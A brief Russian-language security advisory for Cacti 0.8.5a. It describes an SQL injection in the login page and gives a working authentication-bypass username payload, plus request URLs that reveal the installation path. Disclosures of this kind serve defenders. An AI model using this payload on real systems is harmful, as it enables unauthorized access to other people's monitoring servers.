Программа: Cacti 0.8.5a
Уязвимость в проверке входных данных в Cacti позволяет удаленному пользователю внедрить SQL команды, чтобы получить доступ к приложению.
Программа не проверяет данные, представленные пользователем в полях имя пользователя и пароль в auth_login.php. В результате удаленный пользователь может успешно авторизоваться в приложении:
username = admin' or '6'='6
password = password wished
Также удаленный пользователь может раскрыть инсталляционный путь:
http://127.0.0.1/cacti/include/auth.php
http://127.0.0.1/cacti/auth_login.php? action=login
http://127.0.0.1/cacti2/auth_changepassword.php?ref= index.php&action=changepassword&password=
aaaaaa&confirm=aaaaaa&submit=Save
